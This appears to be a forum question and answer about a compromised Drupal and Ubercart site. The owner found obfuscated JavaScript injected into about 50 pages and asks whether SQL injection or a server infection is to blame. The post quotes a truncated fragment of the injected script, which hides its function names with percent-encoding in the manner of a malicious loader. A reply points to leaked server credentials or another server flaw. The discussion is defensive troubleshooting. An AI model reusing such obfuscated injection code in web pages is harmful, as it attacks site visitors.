I’ve found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code.
<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"
Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself?
I am using Drupal + Ubercart with quite minimal forms inputs.
Since the files have been modified, it is unlikely to be SQL injection. Either there is some other security flaw somewhere on the server or credentials for an ftp/ssh/etc account has leaked.